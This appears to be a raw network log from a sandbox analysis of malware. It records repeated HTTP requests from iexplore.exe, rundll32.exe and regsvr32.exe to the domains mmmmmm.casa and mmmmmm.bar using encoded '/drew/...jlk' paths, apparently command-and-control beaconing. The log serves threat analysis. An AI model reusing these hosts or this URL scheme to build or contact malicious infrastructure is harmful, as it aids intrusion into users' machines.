                            Jan 12, 2022 11:13:50.752180099 CET12814OUTGET /drew/IVKP_2B6ZQQkG6g5/gfowffZhbmtN_2B/GZbbScWLQtb1lACgnt/rBntiTQwT/saL_2BBlUn86jR0XyTBo/7JNgQsItTPD2PHGzNKS/G1LTW9fRAA1zfD6_2FMiYB/dg960muYkdAwp/uG8HwcGL/8jG_2BjlGKWZrDL8vqOPVvC/htJk0fRuFB/CZluWe0HHNShwo8us/H7tsPluCA75g/aX_2F3vI3Tj/WjN30iGXtvxagL/uXBGZL_2FYgMxgH/PfB0165.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: mmmmmm.casa
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Jan 12, 2022 11:13:50.942028046 CET12817INHTTP/1.1 302 Found
                            Server: nginx
                            Date: Wed, 12 Jan 2022 10:13:50 GMT
                            Content-Type: text/html; charset=utf-8
                            Content-Length: 320
                            Connection: keep-alive
                            Location: http://www.mmmmmm.casa/drew/IVKP_2B6ZQQkG6g5/gfowffZhbmtN_2B/GZbbScWLQtb1lACgnt/rBntiTQwT/saL_2BBlUn86jR0XyTBo/7JNgQsItTPD2PHGzNKS/G1LTW9fRAA1zfD6_2FMiYB/dg960muYkdAwp/uG8HwcGL/8jG_2BjlGKWZrDL8vqOPVvC/htJk0fRuFB/CZluWe0HHNShwo8us/H7tsPluCA75g/aX_2F3vI3Tj/WjN30iGXtvxagL/uXBGZL_2FYgMxgH/PfB0165.jlk
                            X-Served-By: Namecheap URL Forward
                            Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6d 6d 6d 6d 6d 2e 63 61 73 61 2f 64 72 65 77 2f 49 56 4b 50 5f 32 42 36 5a 51 51 6b 47 36 67 35 2f 67 66 6f 77 66 66 5a 68 62 6d 74 4e 5f 32 42 2f 47 5a 62 62 53 63 57 4c 51 74 62 31 6c 41 43 67 6e 74 2f 72 42 6e 74 69 54 51 77 54 2f 73 61 4c 5f 32 42 42 6c 55 6e 38 36 6a 52 30 58 79 54 42 6f 2f 37 4a 4e 67 51 73 49 74 54 50 44 32 50 48 47 7a 4e 4b 53 2f 47 31 4c 54 57 39 66 52 41 41 31 7a 66 44 36 5f 32 46 4d 69 59 42 2f 64 67 39 36 30 6d 75 59 6b 64 41 77 70 2f 75 47 38 48 77 63 47 4c 2f 38 6a 47 5f 32 42 6a 6c 47 4b 57 5a 72 44 4c 38 76 71 4f 50 56 76 43 2f 68 74 4a 6b 30 66 52 75 46 42 2f 43 5a 6c 75 57 65 30 48 48 4e 53 68 77 6f 38 75 73 2f 48 37 74 73 50 6c 75 43 41 37 35 67 2f 61 58 5f 32 46 33 76 49 33 54 6a 2f 57 6a 4e 33 30 69 47 58 74 76 78 61 67 4c 2f 75 58 42 47 5a 4c 5f 32 46 59 67 4d 78 67 48 2f 50 66 42 30 31 36 35 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                            Data Ascii: <a href='http://www.mmmmmm.casa/drew/IVKP_2B6ZQQkG6g5/gfowffZhbmtN_2B/GZbbScWLQtb1lACgnt/rBntiTQwT/saL_2BBlUn86jR0XyTBo/7JNgQsItTPD2PHGzNKS/G1LTW9fRAA1zfD6_2FMiYB/dg960muYkdAwp/uG8HwcGL/8jG_2BjlGKWZrDL8vqOPVvC/htJk0fRuFB/CZluWe0HHNShwo8us/H7tsPluCA75g/aX_2F3vI3Tj/WjN30iGXtvxagL/uXBGZL_2FYgMxgH/PfB0165.jlk'>Found</a>.
                            Jan 12, 2022 11:14:31.574891090 CET12840OUTGET /drew/O89kIoYukkHw2iqX/AhMjsf0VV5QFYgZ/kFHoGSUTql5nMATTez/zlGIspUJ0/j76OVsrTt0Nd7sD_2F4b/bp9jUjPyXDdZc_2FK0v/dPnfT6KZCI_2F04UJ3vQAP/bumYKjymhbjDK/LPqhtKzi/PG6vU8VyOAfE3kJoq_2FnmQ/686tSvRTaO/HG7aazopIFs0YU1L8/w3MPLoFg4vJR/s_2F_2F3_2F/eZehSHb27f_2Ff/LvnuNMT1_2BI6YAzztnWs/g1WQ4.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: mmmmmm.casa
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Jan 12, 2022 11:14:31.764707088 CET12843INHTTP/1.1 302 Found
                            Server: nginx
                            Date: Wed, 12 Jan 2022 10:14:31 GMT
                            Content-Type: text/html; charset=utf-8
                            Content-Length: 324
                            Connection: keep-alive
                            Location: http://www.mmmmmm.casa/drew/O89kIoYukkHw2iqX/AhMjsf0VV5QFYgZ/kFHoGSUTql5nMATTez/zlGIspUJ0/j76OVsrTt0Nd7sD_2F4b/bp9jUjPyXDdZc_2FK0v/dPnfT6KZCI_2F04UJ3vQAP/bumYKjymhbjDK/LPqhtKzi/PG6vU8VyOAfE3kJoq_2FnmQ/686tSvRTaO/HG7aazopIFs0YU1L8/w3MPLoFg4vJR/s_2F_2F3_2F/eZehSHb27f_2Ff/LvnuNMT1_2BI6YAzztnWs/g1WQ4.jlk
                            X-Served-By: Namecheap URL Forward
                            Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6d 6d 6d 6d 6d 2e 63 61 73 61 2f 64 72 65 77 2f 4f 38 39 6b 49 6f 59 75 6b 6b 48 77 32 69 71 58 2f 41 68 4d 6a 73 66 30 56 56 35 51 46 59 67 5a 2f 6b 46 48 6f 47 53 55 54 71 6c 35 6e 4d 41 54 54 65 7a 2f 7a 6c 47 49 73 70 55 4a 30 2f 6a 37 36 4f 56 73 72 54 74 30 4e 64 37 73 44 5f 32 46 34 62 2f 62 70 39 6a 55 6a 50 79 58 44 64 5a 63 5f 32 46 4b 30 76 2f 64 50 6e 66 54 36 4b 5a 43 49 5f 32 46 30 34 55 4a 33 76 51 41 50 2f 62 75 6d 59 4b 6a 79 6d 68 62 6a 44 4b 2f 4c 50 71 68 74 4b 7a 69 2f 50 47 36 76 55 38 56 79 4f 41 66 45 33 6b 4a 6f 71 5f 32 46 6e 6d 51 2f 36 38 36 74 53 76 52 54 61 4f 2f 48 47 37 61 61 7a 6f 70 49 46 73 30 59 55 31 4c 38 2f 77 33 4d 50 4c 6f 46 67 34 76 4a 52 2f 73 5f 32 46 5f 32 46 33 5f 32 46 2f 65 5a 65 68 53 48 62 32 37 66 5f 32 46 66 2f 4c 76 6e 75 4e 4d 54 31 5f 32 42 49 36 59 41 7a 7a 74 6e 57 73 2f 67 31 57 51 34 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                            Data Ascii: <a href='http://www.mmmmmm.casa/drew/O89kIoYukkHw2iqX/AhMjsf0VV5QFYgZ/kFHoGSUTql5nMATTez/zlGIspUJ0/j76OVsrTt0Nd7sD_2F4b/bp9jUjPyXDdZc_2FK0v/dPnfT6KZCI_2F04UJ3vQAP/bumYKjymhbjDK/LPqhtKzi/PG6vU8VyOAfE3kJoq_2FnmQ/686tSvRTaO/HG7aazopIFs0YU1L8/w3MPLoFg4vJR/s_2F_2F3_2F/eZehSHb27f_2Ff/LvnuNMT1_2BI6YAzztnWs/g1WQ4.jlk'>Found</a>.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            59192.168.2.649927162.255.119.21980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:13:09.989887953 CET12794OUTGET /drew/iTPgFkMUiWF_2Fj_2BXJ/eLS5m_2F0RHDMK53bDw/qXYPEpap6CC0ju_2FKvxUJ/BgKiBRJZA0reJ/M_2BEvg2/n0SUz7ABMgvByMjQHGo4C6V/y6up15FMoS/me3cGYElCp7gjn9mK/XokkgVSPvUEl/9Xh7nBhTNUv/Hu_2FLYCoGylTE/PAnBqftN_2BClsXZ5c30E/LSE6DqmQJKuNMLsT/jIeReNc_2FrwuiM/c415zPXdTdLNE1JVmB/3gOOzGBic4F_2/B.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: mmmmmm.casa
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Jan 12, 2022 11:13:10.179555893 CET12798INHTTP/1.1 302 Found
                            Server: nginx
                            Date: Wed, 12 Jan 2022 10:13:10 GMT
                            Content-Type: text/html; charset=utf-8
                            Content-Length: 324
                            Connection: keep-alive
                            Location: http://www.mmmmmm.casa/drew/iTPgFkMUiWF_2Fj_2BXJ/eLS5m_2F0RHDMK53bDw/qXYPEpap6CC0ju_2FKvxUJ/BgKiBRJZA0reJ/M_2BEvg2/n0SUz7ABMgvByMjQHGo4C6V/y6up15FMoS/me3cGYElCp7gjn9mK/XokkgVSPvUEl/9Xh7nBhTNUv/Hu_2FLYCoGylTE/PAnBqftN_2BClsXZ5c30E/LSE6DqmQJKuNMLsT/jIeReNc_2FrwuiM/c415zPXdTdLNE1JVmB/3gOOzGBic4F_2/B.jlk
                            X-Served-By: Namecheap URL Forward
                            Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6d 6d 6d 6d 6d 2e 63 61 73 61 2f 64 72 65 77 2f 69 54 50 67 46 6b 4d 55 69 57 46 5f 32 46 6a 5f 32 42 58 4a 2f 65 4c 53 35 6d 5f 32 46 30 52 48 44 4d 4b 35 33 62 44 77 2f 71 58 59 50 45 70 61 70 36 43 43 30 6a 75 5f 32 46 4b 76 78 55 4a 2f 42 67 4b 69 42 52 4a 5a 41 30 72 65 4a 2f 4d 5f 32 42 45 76 67 32 2f 6e 30 53 55 7a 37 41 42 4d 67 76 42 79 4d 6a 51 48 47 6f 34 43 36 56 2f 79 36 75 70 31 35 46 4d 6f 53 2f 6d 65 33 63 47 59 45 6c 43 70 37 67 6a 6e 39 6d 4b 2f 58 6f 6b 6b 67 56 53 50 76 55 45 6c 2f 39 58 68 37 6e 42 68 54 4e 55 76 2f 48 75 5f 32 46 4c 59 43 6f 47 79 6c 54 45 2f 50 41 6e 42 71 66 74 4e 5f 32 42 43 6c 73 58 5a 35 63 33 30 45 2f 4c 53 45 36 44 71 6d 51 4a 4b 75 4e 4d 4c 73 54 2f 6a 49 65 52 65 4e 63 5f 32 46 72 77 75 69 4d 2f 63 34 31 35 7a 50 58 64 54 64 4c 4e 45 31 4a 56 6d 42 2f 33 67 4f 4f 7a 47 42 69 63 34 46 5f 32 2f 42 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                            Data Ascii: <a href='http://www.mmmmmm.casa/drew/iTPgFkMUiWF_2Fj_2BXJ/eLS5m_2F0RHDMK53bDw/qXYPEpap6CC0ju_2FKvxUJ/BgKiBRJZA0reJ/M_2BEvg2/n0SUz7ABMgvByMjQHGo4C6V/y6up15FMoS/me3cGYElCp7gjn9mK/XokkgVSPvUEl/9Xh7nBhTNUv/Hu_2FLYCoGylTE/PAnBqftN_2BClsXZ5c30E/LSE6DqmQJKuNMLsT/jIeReNc_2FrwuiM/c415zPXdTdLNE1JVmB/3gOOzGBic4F_2/B.jlk'>Found</a>.
                            Jan 12, 2022 11:13:50.798543930 CET12815OUTGET /drew/cD2Ewm7iGqMWPOkoVh2Hr/lSdxksgYA4mJEN42/6hG4ODNyYAH539U/3fuQQ5LlKDI4bM1b7W/idcaoqxrd/pMXyUBd_2BzEIdIc0JYN/k0d7ofrjRiaIIgn2d7z/QSRTFXDfwTpnog_2FhKWZ2/I464QiuD2zIxn/gdmKXI_2/Bo1ItO7W8SANyxbK0_2B_2B/wmE9_2BVQd/_2FAFT722G6qgOYAX/qZ8FCQq56b14/eJnNZN9d6mJ/4SYZznClo/p0BGlI.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: mmmmmm.casa
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Jan 12, 2022 11:13:50.988233089 CET12818INHTTP/1.1 302 Found
                            Server: nginx
                            Date: Wed, 12 Jan 2022 10:13:50 GMT
                            Content-Type: text/html; charset=utf-8
                            Content-Length: 320
                            Connection: keep-alive
                            Location: http://www.mmmmmm.casa/drew/cD2Ewm7iGqMWPOkoVh2Hr/lSdxksgYA4mJEN42/6hG4ODNyYAH539U/3fuQQ5LlKDI4bM1b7W/idcaoqxrd/pMXyUBd_2BzEIdIc0JYN/k0d7ofrjRiaIIgn2d7z/QSRTFXDfwTpnog_2FhKWZ2/I464QiuD2zIxn/gdmKXI_2/Bo1ItO7W8SANyxbK0_2B_2B/wmE9_2BVQd/_2FAFT722G6qgOYAX/qZ8FCQq56b14/eJnNZN9d6mJ/4SYZznClo/p0BGlI.jlk
                            X-Served-By: Namecheap URL Forward
                            Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6d 6d 6d 6d 6d 2e 63 61 73 61 2f 64 72 65 77 2f 63 44 32 45 77 6d 37 69 47 71 4d 57 50 4f 6b 6f 56 68 32 48 72 2f 6c 53 64 78 6b 73 67 59 41 34 6d 4a 45 4e 34 32 2f 36 68 47 34 4f 44 4e 79 59 41 48 35 33 39 55 2f 33 66 75 51 51 35 4c 6c 4b 44 49 34 62 4d 31 62 37 57 2f 69 64 63 61 6f 71 78 72 64 2f 70 4d 58 79 55 42 64 5f 32 42 7a 45 49 64 49 63 30 4a 59 4e 2f 6b 30 64 37 6f 66 72 6a 52 69 61 49 49 67 6e 32 64 37 7a 2f 51 53 52 54 46 58 44 66 77 54 70 6e 6f 67 5f 32 46 68 4b 57 5a 32 2f 49 34 36 34 51 69 75 44 32 7a 49 78 6e 2f 67 64 6d 4b 58 49 5f 32 2f 42 6f 31 49 74 4f 37 57 38 53 41 4e 79 78 62 4b 30 5f 32 42 5f 32 42 2f 77 6d 45 39 5f 32 42 56 51 64 2f 5f 32 46 41 46 54 37 32 32 47 36 71 67 4f 59 41 58 2f 71 5a 38 46 43 51 71 35 36 62 31 34 2f 65 4a 6e 4e 5a 4e 39 64 36 6d 4a 2f 34 53 59 5a 7a 6e 43 6c 6f 2f 70 30 42 47 6c 49 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                            Data Ascii: <a href='http://www.mmmmmm.casa/drew/cD2Ewm7iGqMWPOkoVh2Hr/lSdxksgYA4mJEN42/6hG4ODNyYAH539U/3fuQQ5LlKDI4bM1b7W/idcaoqxrd/pMXyUBd_2BzEIdIc0JYN/k0d7ofrjRiaIIgn2d7z/QSRTFXDfwTpnog_2FhKWZ2/I464QiuD2zIxn/gdmKXI_2/Bo1ItO7W8SANyxbK0_2B_2B/wmE9_2BVQd/_2FAFT722G6qgOYAX/qZ8FCQq56b14/eJnNZN9d6mJ/4SYZznClo/p0BGlI.jlk'>Found</a>.
                            Jan 12, 2022 11:14:31.576350927 CET12841OUTGET /drew/Gbrj1v9f6rwpYUn6Y/0ESxqmC4O7HZ/1pIQZKpC23v/OvNjMXTiBqucS2/OdUDj2hxo5EF8I9tePbbl/e0WI0OeHAABDBK_2/BGgWBLhnrCwIX2a/eY2i6bDO1XsEiKpdI_/2Ffj5yrES/XUkdgF_2BtB7uvP86zoB/sUHzWtrofPT34R7CvQE/NrT4dtWcKFtgqYMAR1Chky/E9_2FFgkwTE3N/nmdTSRJk/40jKH8Kj7YfIW9Kkspchk3o/Mq7ak.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: mmmmmm.casa
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Jan 12, 2022 11:14:31.766191959 CET12844INHTTP/1.1 302 Found
                            Server: nginx
                            Date: Wed, 12 Jan 2022 10:14:31 GMT
                            Content-Type: text/html; charset=utf-8
                            Content-Length: 313
                            Connection: keep-alive
                            Location: http://www.mmmmmm.casa/drew/Gbrj1v9f6rwpYUn6Y/0ESxqmC4O7HZ/1pIQZKpC23v/OvNjMXTiBqucS2/OdUDj2hxo5EF8I9tePbbl/e0WI0OeHAABDBK_2/BGgWBLhnrCwIX2a/eY2i6bDO1XsEiKpdI_/2Ffj5yrES/XUkdgF_2BtB7uvP86zoB/sUHzWtrofPT34R7CvQE/NrT4dtWcKFtgqYMAR1Chky/E9_2FFgkwTE3N/nmdTSRJk/40jKH8Kj7YfIW9Kkspchk3o/Mq7ak.jlk
                            X-Served-By: Namecheap URL Forward
                            Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6d 6d 6d 6d 6d 2e 63 61 73 61 2f 64 72 65 77 2f 47 62 72 6a 31 76 39 66 36 72 77 70 59 55 6e 36 59 2f 30 45 53 78 71 6d 43 34 4f 37 48 5a 2f 31 70 49 51 5a 4b 70 43 32 33 76 2f 4f 76 4e 6a 4d 58 54 69 42 71 75 63 53 32 2f 4f 64 55 44 6a 32 68 78 6f 35 45 46 38 49 39 74 65 50 62 62 6c 2f 65 30 57 49 30 4f 65 48 41 41 42 44 42 4b 5f 32 2f 42 47 67 57 42 4c 68 6e 72 43 77 49 58 32 61 2f 65 59 32 69 36 62 44 4f 31 58 73 45 69 4b 70 64 49 5f 2f 32 46 66 6a 35 79 72 45 53 2f 58 55 6b 64 67 46 5f 32 42 74 42 37 75 76 50 38 36 7a 6f 42 2f 73 55 48 7a 57 74 72 6f 66 50 54 33 34 52 37 43 76 51 45 2f 4e 72 54 34 64 74 57 63 4b 46 74 67 71 59 4d 41 52 31 43 68 6b 79 2f 45 39 5f 32 46 46 67 6b 77 54 45 33 4e 2f 6e 6d 64 54 53 52 4a 6b 2f 34 30 6a 4b 48 38 4b 6a 37 59 66 49 57 39 4b 6b 73 70 63 68 6b 33 6f 2f 4d 71 37 61 6b 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                            Data Ascii: <a href='http://www.mmmmmm.casa/drew/Gbrj1v9f6rwpYUn6Y/0ESxqmC4O7HZ/1pIQZKpC23v/OvNjMXTiBqucS2/OdUDj2hxo5EF8I9tePbbl/e0WI0OeHAABDBK_2/BGgWBLhnrCwIX2a/eY2i6bDO1XsEiKpdI_/2Ffj5yrES/XUkdgF_2BtB7uvP86zoB/sUHzWtrofPT34R7CvQE/NrT4dtWcKFtgqYMAR1Chky/E9_2FFgkwTE3N/nmdTSRJk/40jKH8Kj7YfIW9Kkspchk3o/Mq7ak.jlk'>Found</a>.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            6192.168.2.64977231.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:10:59.974314928 CET1207OUTGET /drew/Wqqjeuz_2B3o/gTZon0hf6_2/BEGqKHLRv8jJbA/XiM_2F_2BLItgQ9_2FnkV/J37kJU5m548Ry5aD/_2BaeC5gue46teo/Mz94QcIObLwkCmIFSe/AYyEx_2Ft/7flnx_2FeBMaKdb_2BZY/2QcUQ0KczFWXmzcms2u/KqZ09beQmNbj50XJX6IPpt/L8avESS6Nbmyi/27IxeLE_/2B4eudEcqYK8iUY7pnK_2BN/lez_2F9d6B/JO7dBHKHEfmL4H2lk/EeykEsbEse/f.jlk HTTP/1.1
                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                            Accept-Language: en-US
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Accept-Encoding: gzip, deflate
                            Host: mmmmmm.bar
                            Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            60192.168.2.649928198.54.117.21280C:\Windows\SysWOW64\rundll32.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:13:10.310663939 CET12799OUTGET /drew/34vM2Qz4NrxAJPso/55_2BO7dEpmqKKz/UfdYfTV2D9XUJnIX4u/wEi6o1JYk/kRFDZ6mK40EWlsc6Lw5w/mDVFZVW_2F8m7wnjZkk/bWWghhS_2BpKqwr_2FiGlA/mVW8Mpa2fncUu/9kKvVeUJ/1ENXmn00HlfSkjkGGDRsgIQ/xo_2FicWeq/xi1wE7iI0t8C7Pb_2/B0cr_2Fh2Ic_/2BR5T0WLYrL/GDbKM8aDkZ5B8k/D7fVec54KHjYVnHWNjgpP/2UWjy_2BZuxTwv24/xnHIqz6W2/M.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            61192.168.2.649929198.54.117.21680C:\Windows\SysWOW64\regsvr32.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:13:10.361733913 CET12800OUTGET /drew/5Ri1ZRKiUj4KbdI8X3X/Jh19vlM5zKBKS9GzxSI_2F/EeCCCUkcTJxTJ/yjPTlmAW/SRBKYkKZFvOHA4e8slv_2B6/sLkQXSK6LI/s0_2BnCvQV54waFnt/9tgrPrbqXj5k/QVIFNHGIBgE/RWfKnmy0BvALOE/25vpZVbkJbBKa_2B5YQxG/4FAVo0rUlWPdhkO0/sxn_2FX_2BnOQOo/3GUZiFJLlyne50XHpa/61qsG5vaM/AQ3AuwpegmAJLs_2FJdJ/D.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            62192.168.2.649930198.54.117.21680C:\Windows\SysWOW64\regsvr32.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:13:10.386159897 CET12800OUTGET /drew/iTPgFkMUiWF_2Fj_2BXJ/eLS5m_2F0RHDMK53bDw/qXYPEpap6CC0ju_2FKvxUJ/BgKiBRJZA0reJ/M_2BEvg2/n0SUz7ABMgvByMjQHGo4C6V/y6up15FMoS/me3cGYElCp7gjn9mK/XokkgVSPvUEl/9Xh7nBhTNUv/Hu_2FLYCoGylTE/PAnBqftN_2BClsXZ5c30E/LSE6DqmQJKuNMLsT/jIeReNc_2FrwuiM/c415zPXdTdLNE1JVmB/3gOOzGBic4F_2/B.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Host: www.mmmmmm.casa


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            63192.168.2.64993231.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:13:30.640810966 CET12808OUTGET /drew/UcHkZ0zyn6/Z111QSnuhZwHA9u5g/50_2FWEacJHv/3p_2F8yIAef/sKVudtmV_2FktO/8kfLczXGNKLOYbNQ0CJxK/IUjB6xZDhET5KvS_/2BKHLj2IG24UviU/YGxO_2Fxh5C0etXHoJ/n0ikMD6vi/MceOS3R7A4WFRXnTRTW_/2BymlMaVnnMfugU8dCe/wuDikVnnZrVM7HhAvWP1ZM/3BPQVSd9Lkjc_/2BG3HCyN/XrrYdjbHzIQdM6mC57c8tVl/k.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: mmmmmm.bar
                            Connection: Keep-Alive
                            Cache-Control: no-cache


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            64192.168.2.64993331.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:13:30.672808886 CET12809OUTGET /drew/yX2jPs_2FJk7BOaoQtgEiU6/nNQbGh1LU5/204V5EdINWf_2Fd_2/Byf2ExfvNDDz/y_2Fb3qYGFh/SHRXx42ELD51Zr/XViRRzGoc_2F4jsc8S8bJ/kkycv_2BQtVp8DJR/58ep6_2B48AsJVM/1TJuRFxQ3h_2BgvPWU/76cupQFL1/gc_2FubwNTN_2Btz6mOf/SjHCTvdm4okJzy8v6JD/crLXxtBjvbV2b1S_2Flfq_/2Ba_2B_2F_2B_/2BuyHAC7/0QIAnvbOfT2cDi_2B_2FiQ/y.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: mmmmmm.bar
                            Connection: Keep-Alive
                            Cache-Control: no-cache


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            65192.168.2.64993431.41.45.6680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:13:30.725147963 CET12810OUTGET /drew/eEhDmx0a4sdxsRnzPb9hc_2/BoO73Mi9GS/E9f2sOeyD62Bdbz85/pt5vTSpE5LaM/nbIIyujSEBL/OmFR25OlsOla5R/ZGIaEVBjF1eXghMwWqveY/rQjeZF8gVJNH3wHy/B973Qo6ad87bmri/ALD9b8z1P4fLtB7RV6/Qjdo70DfW/fYp2gHONnSJbyqTal3v4/rek0g25YOLcyy_2F69M/9AiJkZF0rkPrM3t880NzXZ/UtPjpWudU/GCl.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: mmmmmm.bar
                            Connection: Keep-Alive
                            Cache-Control: no-cache


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            66192.168.2.649935162.255.119.21980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            TimestampkBytes transferredDirectionData
                            Jan 12, 2022 11:13:31.926413059 CET12811OUTGET /drew/ObPEVjME/uTgl7EeI4pUIcVbTx37h32z/9JQSUI9yi4/tlbn0QAMwdOSinKCj/I_2FUWBt0Kof/eyVYoapjZjh/6Z9m96_2FiRZZq/Ef7PDUJU5SDC1JS1AwcbH/wQMnJUKA0IIbwi4C/FAIRf72ER0v7lod/lgatZ_2BAYH2QVOTor/mfaZi9AdI/vwqa913VT82YpdpouMjC/9nlGDg9K0WVIupxKjJ_/2B_2FQmERF6IRN4evAeoKu/OPglTmf_2/FSu.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: mmmmmm.casa
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Jan 12, 2022 11:13:32.107012987 CET12812INHTTP/1.1 302 Found
                            Server: nginx
                            Date: Wed, 12 Jan 2022 10:13:32 GMT
                            Content-Type: text/html; charset=utf-8
                            Content-Length: 318
                            Connection: keep-alive
                            Location: http://www.mmmmmm.casa/drew/ObPEVjME/uTgl7EeI4pUIcVbTx37h32z/9JQSUI9yi4/tlbn0QAMwdOSinKCj/I_2FUWBt0Kof/eyVYoapjZjh/6Z9m96_2FiRZZq/Ef7PDUJU5SDC1JS1AwcbH/wQMnJUKA0IIbwi4C/FAIRf72ER0v7lod/lgatZ_2BAYH2QVOTor/mfaZi9AdI/vwqa913VT82YpdpouMjC/9nlGDg9K0WVIupxKjJ_/2B_2FQmERF6IRN4evAeoKu/OPglTmf_2/FSu.jlk
                            X-Served-By: Namecheap URL Forward
                            Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6d 6d 6d 6d 6d 2e 63 61 73 61 2f 64 72 65 77 2f 4f 62 50 45 56 6a 4d 45 2f 75 54 67 6c 37 45 65 49 34 70 55 49 63 56 62 54 78 33 37 68 33 32 7a 2f 39 4a 51 53 55 49 39 79 69 34 2f 74 6c 62 6e 30 51 41 4d 77 64 4f 53 69 6e 4b 43 6a 2f 49 5f 32 46 55 57 42 74 30 4b 6f 66 2f 65 79 56 59 6f 61 70 6a 5a 6a 68 2f 36 5a 39 6d 39 36 5f 32 46 69 52 5a 5a 71 2f 45 66 37 50 44 55 4a 55 35 53 44 43 31 4a 53 31 41 77 63 62 48 2f 77 51 4d 6e 4a 55 4b 41 30 49 49 62 77 69 34 43 2f 46 41 49 52 66 37 32 45 52 30 76 37 6c 6f 64 2f 6c 67 61 74 5a 5f 32 42 41 59 48 32 51 56 4f 54 6f 72 2f 6d 66 61 5a 69 39 41 64 49 2f 76 77 71 61 39 31 33 56 54 38 32 59 70 64 70 6f 75 4d 6a 43 2f 39 6e 6c 47 44 67 39 4b 30 57 56 49 75 70 78 4b 6a 4a 5f 2f 32 42 5f 32 46 51 6d 45 52 46 36 49 52 4e 34 65 76 41 65 6f 4b 75 2f 4f 50 67 6c 54 6d 66 5f 32 2f 46 53 75 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                            Data Ascii: <a href='http://www.mmmmmm.casa/drew/ObPEVjME/uTgl7EeI4pUIcVbTx37h32z/9JQSUI9yi4/tlbn0QAMwdOSinKCj/I_2FUWBt0Kof/eyVYoapjZjh/6Z9m96_2FiRZZq/Ef7PDUJU5SDC1JS1AwcbH/wQMnJUKA0IIbwi4C/FAIRf72ER0v7lod/lgatZ_2BAYH2QVOTor/mfaZi9AdI/vwqa913VT82YpdpouMjC/9nlGDg9K0WVIupxKjJ_/2B_2FQmERF6IRN4evAeoKu/OPglTmf_2/FSu.jlk'>Found</a>.
